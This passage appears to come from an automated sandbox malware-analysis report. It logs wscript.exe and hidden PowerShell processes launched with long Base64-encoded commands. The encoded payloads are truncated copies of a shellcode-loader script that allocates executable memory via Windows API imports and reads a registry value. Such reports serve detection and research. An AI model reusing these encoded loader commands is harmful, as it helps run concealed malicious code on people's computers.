QAsAGkAbgB0ACAAUwBZAEQAWQBFAE0ARQBOAEkAVAA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgAdQBpAG4AdAAgAHMAZQByAHUANQAsAGkAbgB0ACAAcwBlAHIAdQA2ACwAaQBuAHQAIABzAGUAcgB1ADcALABpAG4AdAAgAHMAZQByAHUAOAAsAGkAbgB0ACAAcwBlAHIAdQA5ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAdgBvAGkAZAAgAFIAdABsAE0AbwB2AGUATQBlAG0AbwByAHkAKABJAG4AdABQAHQAcgAgAHMAZQByAHUAMQAsAHIAZQBmACAASQBuAHQAMwAyACAAcwBlAHIAdQAyACwAaQBuAHQAIABzAGUAcgB1ADMAKQA7AA0ACgB9AA0ACgAiAEAADQAKACMAZgBlAHIAbgAgAEMAQQBNAFAASABJAFIARQAgAEYASgBFAEQAUgBFAE4AIABDAEEAUABTAEkAQwBJAE4AIABTAGMAYQByAGYAZQBkAGUAbgB0ACAASQBuAHQAZQA5ACAAQQBaAFkATQAgAEYASQBHAFUAUgAgAEEAZgBnAGkAZgB0AHMAbgAzACAAdQBuAHQAaABvAHIAbgBsACAAUwBhAHUAcwBzADMAIABOAE8ATABFACAASABlAGUAZABsAGUAcwBzAGIAIABNAEkATgBFAFIAQQAgAFYAaQBuAGQAZAByAGUAdgBlAHQAIABPAFAASABJAEQASQBPACAATQBBAEcATgBFAFQASQBTAEUAIABnAGEAbAB2ACAAbQBpAGwAdABlAG4AZQBzACAAWABFAE4ATwAgAEEAbABsAGUANQAgAG4AbwBuAG0AbwBuAGkAcwB0ACAAIAANAAoAJABTAFkARABZAEUATQBFAE4ASQBUADMAPQAwADsADQAKACQAUwBZAEQAWQBFAE0ARQBOAEkAVAA5AD0AMQAwADQAOAA1ADcANgA7AA0ACgAkAFMAWQBEAFkARQBNAEUATgBJAFQAOAA9AFsAUwBZAEQAWQBFAE0ARQBOAEkAVAAxAF0AOgA6AE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAC0AMQAsAFsAcgBlAGYAXQAkAFMAWQBEAFkARQBNAEUATgBJAFQAMwAsADAALABbAHIAZQBmAF0AJABTAFkARABZAEUATQBFAE4ASQBUADkALAAxADIAMgA4ADgALAA2ADQAKQANAAoAJABTAHQAZQBuAGYAPQAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMAbwBmAHQAdwBhAHIAZQBcAEMAbABpAHAAIgApAC4ATwBuAGUADQAKAA0ACgAkAFQAQQBMAEEAUgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQgB5AHQAZQBbAF0AXQA6ADoAQwByAGUAYQB0AGUASQBuAHMAdABhAG4AYwBlACgAWw
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -encodedcommand IwBlAHIAaAB2AGUAcgB2AHMAawB1ACAATABlAGoAZQBzAHYAZQBuAGQAZQA5ACAAQQByAGMAaABhAGkAOAAgAFMAYQBnAHMAIABkAHIAbwBzAGgAawBpAGUAcwBoACAAbABhAG4AZABzAGsAYQAgAHcAaQB0AGMAaABiAGUAbAAgAEgAeQBkAHIAYQBuAHQAIABTAGMAdQBsAGwAcwBiAGEAIABhAGkAcgBiAHUAcgBzAHQAdQAgAHIAZQB0AHIAaQBiAHUAdABvACAAZABhAGcAcABhAGEAZgB1ACAAVQBQAFQASABSACAAbQBvAHIAcABpAG8AbgBmACAADQAKAEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAYwBsAGEAcwBzACAAUwBZAEQAWQBFAE0ARQBOAEkAVAAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAAUwBZAEQAWQBFAE0ARQBOAEkAVAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABOAGEAdAB1AHIAOQAsAGkAbgB0ACAAcwBlAHIAdQAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBZAEQAWQBFAE0ARQBOAEkAVAAsAGkAbgB0ACAAYQBkAGoAdQAsAGkAbgB0ACAAUwBZAEQAWQBFAE0ARQBOAEkAVAA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgAdQBpAG4AdAAgAHMAZQByAHUANQAsAGkAbgB0ACAAcwBlAHIAdQA2ACwAaQBuAHQAIABzAGUAcgB1ADcALABpAG4AdAAgAHMAZQByAHUAOAAsAGkAbgB0ACAAcwBlAHIAdQA5ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAdgBvAGkAZAAgAFIAdABsAE0AbwB2AGUATQBlAG0AbwByAHkAKABJAG4AdABQAHQAcgAgAHMAZQByAHUAMQAsAHIAZQBmACAASQBuAHQAMwAyACAAcwBlAHIAdQAyACwAaQBuAHQAIABzAGUAcgB1ADMAKQA7AA0ACgB9AA0ACgAiAEAADQAKACMAZgBlAHIAbgAgAEMAQQBNAFAASABJAFIARQAgAEYASgBFAEQAUgBFAE4AIABDAEEAUABTAEkAQwBJAE4AIABTAGMAYQByAGYAZQBkAGUAbgB0ACAASQBuAHQAZQA5ACAAQQBaAFkATQAgAEYASQBHAFUAUgAgAEEAZgBnAGkAZgB0AHMAbgAzACAAdQBuAHQAaABvAHIAbgBsACAAUwBhAHUAcwBzADMAIABOAE8ATABFACAASABlAGUAZABsAGUAcwBzAGIAIABNAEkATgBFAFIAQQAgAFYAaQBuAGQAZAByAGUAdgBlAHQAIABPAFAASABJAEQASQBPACAATQBBAEcATgBFAFQASQBTAEUAIABnAGEAbAB2ACAAbQBpAGwAdABlAG4AZQBzACAAWABFAE4ATwAgAEEAbABsAGUANQAgAG4AbwBuAG0AbwBuAGkAcwB0ACAAIAANAAoAJABTAFkARABZAEUATQBFAE4ASQBUADMAPQAwADsADQAKACQAUwBZAEQAWQBFAE0ARQBOAEkAVAA5AD0AMQAwADQAOAA1ADcANgA7AA0ACgAkAFMAWQBEAFkARQBNAEUATgBJAFQAOAA9AFsAUwBZAEQAWQBFAE0ARQBOAEkAVAAxAF0AOgA6AE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAC0AMQAsAFsAcgBlAGYAXQAkAFMAWQBEAFkARQBNAEUATgBJAFQAMwAsADAALABbAHIAZQBmAF0AJABTAFkARABZAEUATQBFAE4ASQBUADkALAAxADIAMgA4ADgALAA2ADQAKQANAAoAJABTAHQAZQBuAGYAPQAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMAbwBmAHQAdwBhAHIAZQBcAEMAbABpAHAAIgApAC4ATwBuAGUADQAKAA0ACgAkAFQAQQBMAEEAUgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQgB5AHQAZQBbAF0AXQA6ADoAQwByAGUAYQB0AGUASQBuAHMAdABhAG
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -encodedcommand IwBlAHIAaAB2AGUAcgB2AHMAawB1ACAATABlAGoAZQBzAHYAZQBuAGQAZQA5ACAAQQByAGMAaABhAGkAOAAgAFMAYQBnAHMAIABkAHIAbwBzAGgAawBpAGUAcwBoACAAbABhAG4AZABzAGsAYQAgAHcAaQB0AGMAaABiAGUAbAAgAEgAeQBkAHIAYQBuAHQAIABTAGMAdQBsAGwAcwBiAGEAIABhAGkAcgBiAHUAcgBzAHQAdQAgAHIAZQB0AHIAaQBiAHUAdABvACAAZABhAGcAcABhAGEAZgB1ACAAVQBQAFQASABSACAAbQBvAHIAcABpAG8AbgBmACAADQAKAEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAYwBsAGEAcwBzACAAUwBZAEQAWQBFAE0ARQBOAEkAVAAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAAUwBZAEQAWQBFAE0ARQBOAEkAVAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABOAGEAdAB1AHIAOQAsAGkAbgB0ACAAcwBlAHIAdQAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBZAEQAWQBFAE0ARQBOAEkAVAAsAGkAbgB0ACAAYQBkAGoAdQAsAGkAbgB0ACAAUwBZAEQAWQBFAE0ARQBOAEkAVAA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgAdQBpAG4AdAAgAHMAZQByAHUANQAsAGkAbgB0ACAAcwBlAHIAdQA2ACwAaQBuAHQAIABzAGUAcgB1ADcALABpAG4AdAAgAHMAZQByAHUAOAAsAGkAbgB0ACAAcwBlAHIAdQA5ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAdgBvAGkAZAAgAFIAdABsAE0AbwB2AGUATQBlAG0AbwByAHkAKABJAG4AdABQAHQAcgAgAHMAZQByAHUAMQAsAHIAZQBmACAASQBuAHQAMwAyACAAcwBlAHIAdQAyACwAaQBuAHQAIABzAGUAcgB1ADMAKQA7AA0ACgB9AA0ACgAiAEAADQAKACMAZgBlAHIAbgAgAEMAQQBNAFAASABJAFIARQAgAEYASgBFAEQAUgBFAE4AIABDAEEAUABTAEkAQwBJAE4AIABTAGMAYQByAGYAZQBkAGUAbgB0ACAASQBuAHQAZQA5ACAAQQBaAFkATQAgAEYASQBHAFUAUgAgAEEAZgBnAGkAZgB0AHMAbgAzACAAdQBuAHQAaABvAHIAbgBsACAAUwBhAHUAcwBzADMAIABOAE8ATABFACAASABlAGUAZABsAGUAcwBzAGIAIABNAEkATgBFAFIAQQAgAFYAaQBuAGQAZAByAGUAdgBlAHQAIABPAFAASABJAEQASQBPACAATQBBAEcATgBFAFQASQBTAEUAIABnAGEAbAB2ACAAbQBpAGwAdABlAG4AZQBzACAAWABFAE4ATwAgAEEAbABsAGUANQAgAG4AbwBuAG0AbwBuAGkAcwB0ACAAIAANAAoAJABTAFkARABZAEUATQBFAE4ASQBUADMAPQAwADsADQAKACQAUwBZAEQAWQBFAE0ARQBOAEkAVAA5AD0AMQAwADQAOAA1ADcANgA7AA0ACgAkAFMAWQBEAFkARQBNAEUATgBJAFQAOAA9AFsAUwBZAEQAWQBFAE0ARQBOAEkAVAAxAF0AOgA6AE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAC0AMQAsAFsAcgBlAGYAXQAkAFMAWQBEAFkARQBNAEUATgBJAFQAMwAsADAALABbAHIAZQBmAF0AJABTAFkARABZAEUATQBFAE4ASQBUADkALAAxADIAMgA4ADgALAA2ADQAKQANAAoAJABTAHQAZQBuAGYAPQAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMAbwBmAHQAdwBhAHIAZQBcAEMAbABpAHAAIgApAC4ATwBuAGUADQAKAA0ACgAkAFQAQQBMAEEAUgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQgB5AHQAZQBbAF0AXQA6ADoAQwByAGUAYQB0AGUASQBuAHMAdABhAG
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -NoExit -EncodedCommand "IwBlAHIAaAB2AGUAcgB2AHMAawB1ACAATABlAGoAZQBzAHYAZQBuAGQAZQA5ACAAQQByAGMAaABhAGkAOAAgAFMAYQBnAHMAIABkAHIAbwBzAGgAawBpAGUAcwBoACAAbABhAG4AZABzAGsAYQAgAHcAaQB0AGMAaABiAGUAbAAgAEgAeQBkAHIAYQBuAHQAIABTAGMAdQBsAGwAcwBiAGEAIABhAGkAcgBiAHUAcgBzAHQAdQAgAHIAZQB0AHIAaQBiAHUAdABvACAAZABhAGcAcABhAGEAZgB1ACAAVQBQAFQASABSACAAbQBvAHIAcABpAG8AbgBmACAADQAKAEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAYwBsAGEAcwBzACAAUwBZAEQAWQBFAE0ARQBOAEkAVAAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAAUwBZAEQAWQBFAE0ARQBOAEkAVAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABOAGEAdAB1AHIAOQAsAGkAbgB0ACAAcwBlAHIAdQAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBZAEQAWQBFAE0ARQBOAEkAVAAsAGkAbgB0ACAAYQBkAGoAdQAsAGkAbgB0ACAAUwBZAEQAWQBFAE0ARQBOAEkAVAA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgAdQBpAG4AdAAgAHMAZQByAHUANQAsAGkAbgB0ACAAcwBlAHIAdQA2ACwAaQBuAHQAIABzAGUAcgB1ADcALABpAG4AdAAgAHMAZQByAHUAOAAsAGkAbgB0ACAAcwBlAHIAdQA5ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAdgBvAGkAZAAgAFIAdABsAE0AbwB2AGUATQBlAG0AbwByAHkAKABJAG4AdABQAHQAcgAgAHMAZQByAHUAMQAsAHIAZQBmACAASQBuAHQAMwAyACAAcwBlAHIAdQAyACwAaQBuAHQAIABzAGUAcgB1ADMAKQA7AA0ACgB9AA0ACgAiAEAADQAKACMAZgBlAHIAbgAgAEMAQQBNAFAASABJAFIARQAgAEYASgBFAEQAUgBFAE4AIABDAEEAUABTAEkAQwBJAE4AIABTAGMAYQByAGYAZQBkAGUAbgB0ACAASQBuAHQAZQA5ACAAQQBaAFkATQAgAEYASQBHAFUAUgAgAEEAZgBnAGkAZgB0AHMAbgAzACAAdQBuAHQAaABvAHIAbgBsACAAUwBhAHUAcwBzADMAIABOAE8ATABFACAASABlAGUAZABsAGUAcwBzAGIAIABNAEkATgBFAFIAQQAgAFYAaQBuAGQAZAByAGUAdgBlAHQAIABPAFAASABJAEQASQBPACAATQBBAEcATgBFAFQASQBTAEUAIABnAGEAbAB2ACAAbQBpAGwAdABlAG4AZQBzACAAWABFAE4ATwAgAEEAbABsAGUANQAgAG4AbwBuAG0AbwBuAGkAcwB0ACAAIAANAAoAJABTAFkARABZAEUATQBFAE4ASQBUADMAPQAwADsADQAKACQAUwBZAEQAWQBFAE0ARQBOAEkAVAA5AD0AMQAwADQAOAA1ADcANgA7AA0ACgAkAFMAWQBEAFkARQBNAEUATgBJAFQAOAA9AFsAUwBZAEQAWQBFAE0ARQBOAEkAVAAxAF0AOgA6AE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAC0AMQAsAFsAcgBlAGYAXQAkAFMAWQBEAFkARQBNAEUATgBJAFQAMwAsADAALABbAHIAZQBmAF0AJABTAFkARABZAEUATQBFAE4ASQBUADkALAAxADIAMgA4ADgALAA2ADQAKQANAAoAJABTAHQAZQBuAGYAPQAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMAbwBmAHQAdwBhAHIAZQBcAEMAbABpAHAAIgApAC4ATwBuAGUADQAKAA0ACgAkAFQAQQBMAEEAUgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQgB5AHQAZQBbAF0AXQA6ADoAQwByAGUAYQB0AGUASQBuAHMAdABhAG4AYwBlACgAWw Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -encodedcommand IwBlAHIAaAB2AGUAcgB2AHMAawB1ACAATABlAGoAZQBzAHYAZQBuAGQAZQA5ACAAQQByAGMAaABhAGkAOAAgAFMAYQBnAHMAIABkAHIAbwBzAGgAawBpAGUAcwBoACAAbABhAG4AZABzAGsAYQAgAHcAaQB0AGMAaABiAGUAbAAgAEgAeQBkAHIAYQBuAHQAIABTAGMAdQBsAGwAcwBiAGEAIABhAGkAcgBiAHUAcgBzAHQAdQAgAHIAZQB0AHIAaQBiAHUAdABvACAAZABhAGcAcABhAGEAZgB1ACAAVQBQAFQASABSACAAbQBvAHIAcABpAG8AbgBmACAADQAKAEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAYwBsAGEAcwBzACAAUwBZAEQAWQBFAE0ARQBOAEkAVAAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAAUwBZAEQAWQBFAE0ARQBOAEkAVAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABOAGEAdAB1AHIAOQAsAGkAbgB0ACAAcwBlAHIAdQAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBZAEQAWQBFAE0ARQBOAEkAVAAsAGkAbgB0ACAAYQBkAGoAdQAsAGkAbgB0ACAAUwBZAEQAWQBFAE0ARQBOAEkAVAA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgAdQBpAG4AdAAgAHMAZQByAHUANQAsAGkAbgB0ACAAcwBlAHIAdQA2ACwAaQBuAHQAIABzAGUAcgB1ADcALABpAG4AdAAgAHMAZQByAHUAOAAsAGkAbgB0ACAAcwBlAHIAdQA5ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAdgBvAGkAZAAgAFIAdABsAE0AbwB2AGUATQBlAG0AbwByAHkAKABJAG4AdABQAHQAcgAgAHMAZQByAHUAMQAsAHIAZQBmACAASQBuAHQAMwAyACAAcwBlAHIAdQAyACwAaQBuAHQAIABzAGUAcgB1ADMAKQA7AA0ACgB9AA0ACgAiAEAADQAKACMAZgBlAHIAbgAgAEMAQQBNAFAASABJAFIARQAgAEYASgBFAEQAUgBFAE4AIABDAEEAUABTAEkAQwBJAE4AIABTAGMAYQByAGYAZQBkAGUAbgB0ACAASQBuAHQAZQA5ACAAQQBaAFkATQAgAEYASQBHAFUAUgAgAEEAZgBnAGkAZgB0AHMAbgAzACAAdQBuAHQAaABvAHIAbgBsACAAUwBhAHUAcwBzADMAIABOAE8ATABFACAASABlAGUAZABsAGUAcwBzAGIAIABNAEkATgBFAFIAQQAgAFYAaQBuAGQAZAByAGUAdgBlAHQAIABPAFAASABJAEQASQBPACAATQBBAEcATgBFAFQASQBTAEUAIABnAGEAbAB2ACAAbQBpAGwAdABlAG4AZQBzACAAWABFAE4ATwAgAEEAbABsAGUANQAgAG4AbwBuAG0AbwBuAGkAcwB0ACAAIAANAAoAJABTAFkARABZAEUATQBFAE4ASQBUADMAPQAwADsADQAKACQAUwBZAEQAWQBFAE0ARQBOAEkAVAA5AD0AMQAwADQAOAA1ADcANgA7AA0ACgAkAFMAWQBEAFkARQBNAEUATgBJAFQAOAA9AFsAUwBZAEQAWQBFAE0ARQBOAEkAVAAxAF0AOgA6AE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAC0AMQAsAFsAcgBlAGYAXQAkAFMAWQBEAFkARQBNAEUATgBJAFQAMwAsADAALABbAHIAZQBmAF0AJABTAFkARABZAEUATQBFAE4ASQBUADkALAAxADIAMgA4ADgALAA2ADQAKQANAAoAJABTAHQAZQBuAGYAPQAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMAbwBmAHQAdwBhAHIAZQBcAEMAbABpAHAAIgApAC4ATwBuAGUADQAKAA0ACgAkAFQAQQBMAEEAUgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQgB5AHQAZQBbAF0AXQA6ADoAQwByAGUAYQB0AGUASQBuAHMAdABhAG Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -encodedcommand IwBlAHIAaAB2AGUAcgB2AHMAawB1ACAATABlAGoAZQBzAHYAZQBuAGQAZQA5ACAAQQByAGMAaABhAGkAOAAgAFMAYQBnAHMAIABkAHIAbwBzAGgAawBpAGUAcwBoACAAbABhAG4AZABzAGsAYQAgAHcAaQB0AGMAaABiAGUAbAAgAEgAeQBkAHIAYQBuAHQAIABTAGMAdQBsAGwAcwBiAGEAIABhAGkAcgBiAHUAcgBzAHQAdQAgAHIAZQB0AHIAaQBiAHUAdABvACAAZABhAGcAcABhAGEAZgB1ACAAVQBQAFQASABSACAAbQBvAHIAcABpAG8AbgBmACAADQAKAEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAYwBsAGEAcwBzACAAUwBZAEQAWQBFAE0ARQBOAEkAVAAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAAUwBZAEQAWQBFAE0ARQBOAEkAVAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABOAGEAdAB1AHIAOQAsAGkAbgB0ACAAcwBlAHIAdQAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBZAEQAWQBFAE0ARQBOAEkAVAAsAGkAbgB0ACAAYQBkAGoAdQAsAGkAbgB0ACAAUwBZAEQAWQBFAE0ARQBOAEkAVAA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgAdQBpAG4AdAAgAHMAZQByAHUANQAsAGkAbgB0ACAAcwBlAHIAdQA2ACwAaQBuAHQAIABzAGUAcgB1ADcALABpAG4AdAAgAHMAZQByAHUAOAAsAGkAbgB0ACAAcwBlAHIAdQA5ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAdgBvAGkAZAAgAFIAdABsAE0AbwB2AGUATQBlAG0AbwByAHkAKABJAG4AdABQAHQAcgAgAHMAZQByAHUAMQAsAHIAZQBmACAASQBuAHQAMwAyACAAcwBlAHIAdQAyACwAaQBuAHQAIABzAGUAcgB1ADMAKQA7AA0ACgB9AA0ACgAiAEAADQAKACMAZgBlAHIAbgAgAEMAQQBNAFAASABJAFIARQAgAEYASgBFAEQAUgBFAE4AIABDAEEAUABTAEkAQwBJAE4AIABTAGMAYQByAGYAZQBkAGUAbgB0ACAASQBuAHQAZQA5ACAAQQBaAFkATQAgAEYASQBHAFUAUgAgAEEAZgBnAGkAZgB0AHMAbgAzACAAdQBuAHQAaABvAHIAbgBsACAAUwBhAHUAcwBzADMAIABOAE8ATABFACAASABlAGUAZABsAGUAcwBzAGIAIABNAEkATgBFAFIAQQAgAFYAaQBuAGQAZAByAGUAdgBlAHQAIABPAFAASABJAEQASQBPACAATQBBAEcATgBFAFQA